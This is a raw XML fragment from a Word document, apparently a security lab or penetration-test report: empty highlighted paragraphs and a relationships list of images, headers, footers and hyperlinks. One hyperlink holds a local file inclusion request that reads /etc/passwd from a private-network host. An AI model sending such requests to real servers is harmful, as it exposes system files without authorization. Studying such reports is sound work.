    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B4">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B5">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B6">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B8">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId58" w:type="default"/>
      <w:footerReference r:id="rId59" w:type="default"/>
      <w:footerReference r:id="rId60" w:type="first"/>
      <w:footerReference r:id="rId61"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C">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D">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40.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.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7.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.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27.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.14.35/disclaimer.php?page=/etc/passwd" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wlcometorecall.com" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.welcometorecall.com" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.welcometorecal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